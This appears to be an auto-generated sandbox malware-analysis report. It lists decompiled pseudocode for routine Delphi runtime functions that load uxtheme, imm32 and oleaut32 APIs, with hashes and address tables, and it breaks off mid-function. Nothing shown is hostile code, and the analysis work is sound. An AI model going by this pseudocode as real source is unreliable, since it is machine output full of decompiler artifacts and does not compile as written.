                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042FFB8, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E0042FFB8(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				intOrPtr* _t65;
				intOrPtr* _t67;
				void* _t68;

				_t67 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t68 = _t17 - 0x84;
				if(_t68 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E0042C618(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						return E0042D128(_t50, _t67);
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E0042FF24(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E00432804(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t67 + 8)));
						_push( *((intOrPtr*)(_t67 + 4)));
						_push( *_t67);
						_t32 = E004325A4(_t50);
						_push(_t32);
						L004061D0();
						return _t32;
					}
					goto L27;
				}
				if(_t68 == 0) {
					_t21 = E0042D128(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E00406694( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E0042BA34(_t50,  &_v28,  &_v20);
					_t21 = E0042FE90(_t50, 0,  &_v28, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t67 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t65 = E00442544(__eax);
					if(_t65 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t65 + 0xe8))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E004325A4(__eax);
						if(_t45 == GetCapture() &&  *0x44da94 != 0) {
							_t47 =  *0x44da94; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x44da94; // 0x0
								E0042D05C(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}


















                                  0x0042ffbe
                                  0x0042ffc0
                                  0x0042ffc2
                                  0x0042ffc4
                                  0x0042ffc9
                                  0x0042ffe8
                                  0x0042ffeb
                                  0x004300c8
                                  0x004300cf
                                  0x0043011a
                                  0x0043011a
                                  0x0043011a
                                  0x0043010b
                                  0x00000000
                                  0x0043010f
                                  0x0042fff9
                                  0x00430092
                                  0x00430099
                                  0x00000000
                                  0x00000000
                                  0x0043009f
                                  0x00000000
                                  0x00000000
                                  0x004300a3
                                  0x004300aa
                                  0x00000000
                                  0x00000000
                                  0x004300af
                                  0x004300b3
                                  0x004300b6
                                  0x004300b9
                                  0x004300be
                                  0x004300bf
                                  0x00000000
                                  0x004300bf
                                  0x00000000
                                  0x0042ffff
                                  0x0042ffcb
                                  0x00430041
                                  0x0043004a
                                  0x00000000
                                  0x00000000
                                  0x00430059
                                  0x00430068
                                  0x00430075
                                  0x0043007c
                                  0x00000000
                                  0x00000000
                                  0x00430082
                                  0x00000000
                                  0x00430082
                                  0x0042ffcd
                                  0x0042ffd0
                                  0x0043000b
                                  0x0043000f
                                  0x00000000
                                  0x00000000
                                  0x0043001b
                                  0x00430023
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00430029
                                  0x0042ffd2
                                  0x0042ffd3
                                  0x00430032
                                  0x00000000
                                  0x00000000
                                  0x0042ffd5
                                  0x0042ffd8
                                  0x004300d5
                                  0x004300e3
                                  0x004300ee
                                  0x004300f6
                                  0x00430101
                                  0x00430106
                                  0x00430106
                                  0x004300f6
                                  0x004300e3
                                  0x0042ffd8

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Capture
                                  • String ID:
                                  • API String ID: 1145282425-3916222277
                                  • Opcode ID: ce5a3a7b1ec12c933aa641e11d885e58287bd0ede2bb50b6db310ae9d3043442
                                  • Instruction ID: c1f7e18c609f4fb5e679c84ea5eefe12639155aa3325f822ddf52050d8d32f7b
                                  • Opcode Fuzzy Hash: ce5a3a7b1ec12c933aa641e11d885e58287bd0ede2bb50b6db310ae9d3043442
                                  • Instruction Fuzzy Hash: 5931B03030021047CE28AA399DA671B63959B49318F446A3FE466C7B93CA7ECC06975D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004239F0, Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E004239F0(void* __ebx, void* __ecx) {
				char _v5;
				intOrPtr _t2;
				intOrPtr _t6;
				intOrPtr _t108;
				intOrPtr _t111;

				_t2 =  *0x44fa40; // 0x2190dc8
				E004237E8(_t2);
				_push(_t111);
				_push(0x423da3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				 *0x44fa3c =  *0x44fa3c + 1;
				if( *0x44fa38 == 0) {
					 *0x44fa38 = LoadLibraryA("uxtheme.dll");
					if( *0x44fa38 > 0) {
						 *0x44f978 = GetProcAddress( *0x44fa38, "OpenThemeData");
						 *0x44f97c = GetProcAddress( *0x44fa38, "CloseThemeData");
						 *0x44f980 = GetProcAddress( *0x44fa38, "DrawThemeBackground");
						 *0x44f984 = GetProcAddress( *0x44fa38, "DrawThemeText");
						 *0x44f988 = GetProcAddress( *0x44fa38, "GetThemeBackgroundContentRect");
						 *0x44f98c = GetProcAddress( *0x44fa38, "GetThemeBackgroundContentRect");
						 *0x44f990 = GetProcAddress( *0x44fa38, "GetThemePartSize");
						 *0x44f994 = GetProcAddress( *0x44fa38, "GetThemeTextExtent");
						 *0x44f998 = GetProcAddress( *0x44fa38, "GetThemeTextMetrics");
						 *0x44f99c = GetProcAddress( *0x44fa38, "GetThemeBackgroundRegion");
						 *0x44f9a0 = GetProcAddress( *0x44fa38, "HitTestThemeBackground");
						 *0x44f9a4 = GetProcAddress( *0x44fa38, "DrawThemeEdge");
						 *0x44f9a8 = GetProcAddress( *0x44fa38, "DrawThemeIcon");
						 *0x44f9ac = GetProcAddress( *0x44fa38, "IsThemePartDefined");
						 *0x44f9b0 = GetProcAddress( *0x44fa38, "IsThemeBackgroundPartiallyTransparent");
						 *0x44f9b4 = GetProcAddress( *0x44fa38, "GetThemeColor");
						 *0x44f9b8 = GetProcAddress( *0x44fa38, "GetThemeMetric");
						 *0x44f9bc = GetProcAddress( *0x44fa38, "GetThemeString");
						 *0x44f9c0 = GetProcAddress( *0x44fa38, "GetThemeBool");
						 *0x44f9c4 = GetProcAddress( *0x44fa38, "GetThemeInt");
						 *0x44f9c8 = GetProcAddress( *0x44fa38, "GetThemeEnumValue");
						 *0x44f9cc = GetProcAddress( *0x44fa38, "GetThemePosition");
						 *0x44f9d0 = GetProcAddress( *0x44fa38, "GetThemeFont");
						 *0x44f9d4 = GetProcAddress( *0x44fa38, "GetThemeRect");
						 *0x44f9d8 = GetProcAddress( *0x44fa38, "GetThemeMargins");
						 *0x44f9dc = GetProcAddress( *0x44fa38, "GetThemeIntList");
						 *0x44f9e0 = GetProcAddress( *0x44fa38, "GetThemePropertyOrigin");
						 *0x44f9e4 = GetProcAddress( *0x44fa38, "SetWindowTheme");
						 *0x44f9e8 = GetProcAddress( *0x44fa38, "GetThemeFilename");
						 *0x44f9ec = GetProcAddress( *0x44fa38, "GetThemeSysColor");
						 *0x44f9f0 = GetProcAddress( *0x44fa38, "GetThemeSysColorBrush");
						 *0x44f9f4 = GetProcAddress( *0x44fa38, "GetThemeSysBool");
						 *0x44f9f8 = GetProcAddress( *0x44fa38, "GetThemeSysSize");
						 *0x44f9fc = GetProcAddress( *0x44fa38, "GetThemeSysFont");
						 *0x44fa00 = GetProcAddress( *0x44fa38, "GetThemeSysString");
						 *0x44fa04 = GetProcAddress( *0x44fa38, "GetThemeSysInt");
						 *0x44fa08 = GetProcAddress( *0x44fa38, "IsThemeActive");
						 *0x44fa0c = GetProcAddress( *0x44fa38, "IsAppThemed");
						 *0x44fa10 = GetProcAddress( *0x44fa38, "GetWindowTheme");
						 *0x44fa14 = GetProcAddress( *0x44fa38, "EnableThemeDialogTexture");
						 *0x44fa18 = GetProcAddress( *0x44fa38, "IsThemeDialogTextureEnabled");
						 *0x44fa1c = GetProcAddress( *0x44fa38, "GetThemeAppProperties");
						 *0x44fa20 = GetProcAddress( *0x44fa38, "SetThemeAppProperties");
						 *0x44fa24 = GetProcAddress( *0x44fa38, "GetCurrentThemeName");
						 *0x44fa28 = GetProcAddress( *0x44fa38, "GetThemeDocumentationProperty");
						 *0x44fa2c = GetProcAddress( *0x44fa38, "DrawThemeParentBackground");
						 *0x44fa30 = GetProcAddress( *0x44fa38, "EnableTheming");
					}
				}
				_v5 =  *0x44fa38 > 0;
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x423daa);
				_t6 =  *0x44fa40; // 0x2190dc8
				return E004237F0(_t6);
			}








                                  0x004239fa
                                  0x004239ff
                                  0x00423a06
                                  0x00423a07
                                  0x00423a0c
                                  0x00423a0f
                                  0x00423a12
                                  0x00423a1b
                                  0x00423a2b
                                  0x00423a30
                                  0x00423a43
                                  0x00423a55
                                  0x00423a67
                                  0x00423a79
                                  0x00423a8b
                                  0x00423a9d
                                  0x00423aaf
                                  0x00423ac1
                                  0x00423ad3
                                  0x00423ae5
                                  0x00423af7
                                  0x00423b09
                                  0x00423b1b
                                  0x00423b2d
                                  0x00423b3f
                                  0x00423b51
                                  0x00423b63
                                  0x00423b75
                                  0x00423b87
                                  0x00423b99
                                  0x00423bab
                                  0x00423bbd
                                  0x00423bcf
                                  0x00423be1
                                  0x00423bf3
                                  0x00423c05
                                  0x00423c17
                                  0x00423c29
                                  0x00423c3b
                                  0x00423c4d
                                  0x00423c5f
                                  0x00423c71
                                  0x00423c83
                                  0x00423c95
                                  0x00423ca7
                                  0x00423cb9
                                  0x00423ccb
                                  0x00423cdd
                                  0x00423cef
                                  0x00423d01
                                  0x00423d13
                                  0x00423d25
                                  0x00423d37
                                  0x00423d49
                                  0x00423d5b
                                  0x00423d6d
                                  0x00423d7f
                                  0x00423d7f
                                  0x00423a30
                                  0x00423d87
                                  0x00423d8d
                                  0x00423d90
                                  0x00423d93
                                  0x00423d98
                                  0x00423da2

                                  APIs
                                  • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,00423DA3), ref: 00423A26
                                  • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 00423A3E
                                  • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 00423A50
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 00423A62
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 00423A74
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 00423A86
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 00423A98
                                  • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 00423AAA
                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 00423ABC
                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 00423ACE
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 00423AE0
                                  • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 00423AF2
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 00423B04
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 00423B16
                                  • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 00423B28
                                  • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 00423B3A
                                  • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 00423B4C
                                  • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 00423B5E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 00423B70
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 00423B82
                                  • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 00423B94
                                  • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 00423BA6
                                  • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 00423BB8
                                  • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 00423BCA
                                  • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 00423BDC
                                  • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 00423BEE
                                  • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 00423C00
                                  • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 00423C12
                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00423C24
                                  • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 00423C36
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 00423C48
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 00423C5A
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 00423C6C
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 00423C7E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 00423C90
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 00423CA2
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 00423CB4
                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00423CC6
                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00423CD8
                                  • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 00423CEA
                                  • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 00423CFC
                                  • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 00423D0E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 00423D20
                                  • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 00423D32
                                  • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 00423D44
                                  • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 00423D56
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 00423D68
                                  • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 00423D7A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                  • API String ID: 2238633743-2910565190
                                  • Opcode ID: 894e4f1e99a824bb32007d5b3563c58f3b6ad6c70a40204f8856db3567b65ccf
                                  • Instruction ID: 32d8e9dda109dd1cedbabccab8db552a29068f61de417213d39679b414b1be6d
                                  • Opcode Fuzzy Hash: 894e4f1e99a824bb32007d5b3563c58f3b6ad6c70a40204f8856db3567b65ccf
                                  • Instruction Fuzzy Hash: 8BA1F0B5B04A20AFDB00DFB5EC86A2A37A8EB0AB447940576B400EF295D67C9904CF5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00436C9C, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E00436C9C() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x44e114; // 0x44f740
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x436e02);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					if( *0x44fb64 == 0) {
						 *0x44fb64 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x44db00 == 0) {
						 *0x44db00 = LoadLibraryA("imm32.dll");
						if( *0x44db00 != 0) {
							_t11 =  *0x44db00; // 0x0
							 *0x44fb68 = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x44db00; // 0x0
							 *0x44fb6c = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x44db00; // 0x0
							 *0x44fb70 = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x44db00; // 0x0
							 *0x44fb74 = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x44db00; // 0x0
							 *0x44fb78 = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x44db00; // 0x0
							 *0x44fb7c = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x44db00; // 0x0
							 *0x44fb80 = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x44db00; // 0x0
							 *0x44fb84 = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x44db00; // 0x0
							 *0x44fb88 = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x44db00; // 0x0
							 *0x44fb8c = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x436e09);
					return SetErrorMode(_v8);
				}
			}


















                                  0x00436c9d
                                  0x00436ca1
                                  0x00436caa
                                  0x00436e0c
                                  0x00436cb0
                                  0x00436cba
                                  0x00436cbf
                                  0x00436cc0
                                  0x00436cc5
                                  0x00436cc8
                                  0x00436cd2
                                  0x00436ceb
                                  0x00436ceb
                                  0x00436cf7
                                  0x00436d07
                                  0x00436d13
                                  0x00436d1e
                                  0x00436d29
                                  0x00436d33
                                  0x00436d3e
                                  0x00436d48
                                  0x00436d53
                                  0x00436d5d
                                  0x00436d68
                                  0x00436d72
                                  0x00436d7d
                                  0x00436d87
                                  0x00436d92
                                  0x00436d9c
                                  0x00436da7
                                  0x00436db1
                                  0x00436dbc
                                  0x00436dc6
                                  0x00436dd1
                                  0x00436ddb
                                  0x00436de6
                                  0x00436de6
                                  0x00436d13
                                  0x00436ded
                                  0x00436df0
                                  0x00436df3
                                  0x00436e01
                                  0x00436e01

                                  APIs
                                  • SetErrorMode.KERNEL32(00008000), ref: 00436CB5
                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00436E02,?,00008000), ref: 00436CD9
                                  • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00436CE6
                                  • LoadLibraryA.KERNEL32(imm32.dll,00000000,00436E02,?,00008000), ref: 00436D02
                                  • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00436D24
                                  • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00436D39
                                  • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00436D4E
                                  • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00436D63
                                  • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00436D78
                                  • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00436D8D
                                  • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00436DA2
                                  • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00436DB7
                                  • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00436DCC
                                  • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00436DE1
                                  • SetErrorMode.KERNEL32(?,00436E09,00008000), ref: 00436DFC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                  • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                  • API String ID: 3397921170-3950384806
                                  • Opcode ID: 1a0eca1e7b9a1f21f434a4e0cc69b1be7aeb05f7b79684b77ff6610deaca4bfa
                                  • Instruction ID: e5f94a84032ef7403cc1fea1a4322095b057e0b0f2a862b79d299bc1d1a8339c
                                  • Opcode Fuzzy Hash: 1a0eca1e7b9a1f21f434a4e0cc69b1be7aeb05f7b79684b77ff6610deaca4bfa
                                  • Instruction Fuzzy Hash: 9531217EA44A81AED701DBB5DC16A2636E8E70FB44F56543AB000A7191D67CAC08CF5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D420, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040D420() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x44f7a0 = E0040D3F4("VariantChangeTypeEx", E0040CF90, _t91);
				 *0x44f7a4 = E0040D3F4("VarNeg", E0040CFC0, _t91);
				 *0x44f7a8 = E0040D3F4("VarNot", E0040CFC0, _t91);
				 *0x44f7ac = E0040D3F4("VarAdd", E0040CFCC, _t91);
				 *0x44f7b0 = E0040D3F4("VarSub", E0040CFCC, _t91);
				 *0x44f7b4 = E0040D3F4("VarMul", E0040CFCC, _t91);
				 *0x44f7b8 = E0040D3F4("VarDiv", E0040CFCC, _t91);
				 *0x44f7bc = E0040D3F4("VarIdiv", E0040CFCC, _t91);
				 *0x44f7c0 = E0040D3F4("VarMod", E0040CFCC, _t91);
				 *0x44f7c4 = E0040D3F4("VarAnd", E0040CFCC, _t91);
				 *0x44f7c8 = E0040D3F4("VarOr", E0040CFCC, _t91);
				 *0x44f7cc = E0040D3F4("VarXor", E0040CFCC, _t91);
				 *0x44f7d0 = E0040D3F4("VarCmp", E0040CFD8, _t91);
				 *0x44f7d4 = E0040D3F4("VarI4FromStr", E0040CFE4, _t91);
				 *0x44f7d8 = E0040D3F4("VarR4FromStr", E0040D050, _t91);
				 *0x44f7dc = E0040D3F4("VarR8FromStr", E0040D0BC, _t91);
				 *0x44f7e0 = E0040D3F4("VarDateFromStr", E0040D128, _t91);
				 *0x44f7e4 = E0040D3F4("VarCyFromStr", E0040D194, _t91);
				 *0x44f7e8 = E0040D3F4("VarBoolFromStr", E0040D200, _t91);
				 *0x44f7ec = E0040D3F4("VarBstrFromCy", E0040D280, _t91);
				 *0x44f7f0 = E0040D3F4("VarBstrFromDate", E0040D2F0, _t91);
				_t46 = E0040D3F4("VarBstrFromBool", E0040D360, _t91);
				 *0x44f7f4 = _t46;
				return _t46;
			}






                                  0x0040d42e
                                  0x0040d442
                                  0x0040d458
                                  0x0040d46e
                                  0x0040d484
                                  0x0040d49a
                                  0x0040d4b0
                                  0x0040d4c6
                                  0x0040d4dc
                                  0x0040d4f2
                                  0x0040d508
                                  0x0040d51e
                                  0x0040d534
                                  0x0040d54a
                                  0x0040d560
                                  0x0040d576
                                  0x0040d58c
                                  0x0040d5a2
                                  0x0040d5b8
                                  0x0040d5ce
                                  0x0040d5e4
                                  0x0040d5fa
                                  0x0040d60a
                                  0x0040d610
                                  0x0040d617

                                  APIs
                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040D429
                                    • Part of subcall function 0040D3F4: GetProcAddress.KERNEL32(00000000), ref: 0040D40D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                  • API String ID: 1646373207-1918263038
                                  • Opcode ID: 255dd2285c0c7b9acaef91aea70060ea4adf23980279e7f8fa5eb05745d3e63d
                                  • Instruction ID: 4e17dbab0ced2a5d9a21aa171c0d3dcd48ca4c1504809416a8193390fea1395b
                                  • Opcode Fuzzy Hash: 255dd2285c0c7b9acaef91aea70060ea4adf23980279e7f8fa5eb05745d3e63d
                                  • Instruction Fuzzy Hash: 4B4124A6E042099BD3086BEE784142777DAD645714360C53FF808FBAC5DF3DA84D9A2E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041D2E8, Relevance: 37.7, APIs: 25, Instructions: 248windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 52%
                                  			E0041D2E8(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				intOrPtr* _t78;
				intOrPtr _t87;
				struct HDC__* _t88;
				intOrPtr _t91;
				struct HDC__* _t92;
				struct HDC__* _t135;
				int _t162;
				intOrPtr _t169;
				intOrPtr _t171;
				struct HDC__* _t173;
				int _t175;
				void* _t177;
				void* _t178;
				intOrPtr _t179;

				_t177 = _t178;
				_t179 = _t178 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t173 = __eax;
				_t175 = _a16;
				_t162 = _a20;
				_v13 = 1;
				_t78 =  *0x44e108; // 0x44d0c4
